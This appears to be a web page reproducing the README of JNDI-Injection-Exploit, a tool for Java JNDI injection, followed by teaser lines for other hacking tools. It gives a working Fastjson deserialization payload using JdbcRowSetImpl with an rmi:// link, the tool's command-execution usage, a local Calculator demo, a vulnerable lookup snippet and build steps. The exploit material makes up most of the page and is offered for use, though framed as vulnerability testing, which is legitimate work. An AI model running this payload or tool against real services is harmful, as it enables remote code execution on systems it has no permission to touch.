JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server, LDAP server and HTTP server. RMI server and LDAP server are based on marshals and modified further to link with HTTP server.
Using this tool allows you get JNDI links, you can insert these links into your POC to test vulnerability.
For example, this is a Fastjson vul-poc:
{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”rmi://127.0.0.1:1099/Object”,”autoCommit”:true}
We can replace “rmi://127.0.0.1:1099/Object” with the link generated by JNDI-Injection-Exploit to test vulnerability.
Run as
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
where:
Points for attention:
Local demo:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “open /Applications/Calculator.app” -A “127.0.0.1”
In this example, it looks like this:
public static void main(String[] args) throws Exception{
InitialContext ctx = new InitialContext();
ctx.lookup(“rmi://127.0.0.1/fgf4fp”);
}
then when we run this code, the command will be executed ,
and the log will be printed in shell.
We can select one of the two methods to get the jar.
$ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
$ cd JNDI-Injection-Exploit
$ mvn clean package -DskipTests
Burrow is an open source tool for burrowing through firewalls, built by teenagers at Hack Club.…
Simple golang webserver that listens for basic auth or post requests and sends a notification…
Nutek Security Platform for macOS and Linux operating systems. Tools for hackers, bug hunters and…
Welcome to SecureSphere Labs, your go-to destination for a curated collection of powerful hacking tools…
All in one Docker-based workstation with hacking tools for Pentesting and offsec Labs by maintained…
Got it! Below is the updated README.md file with instructions for downloading the project on…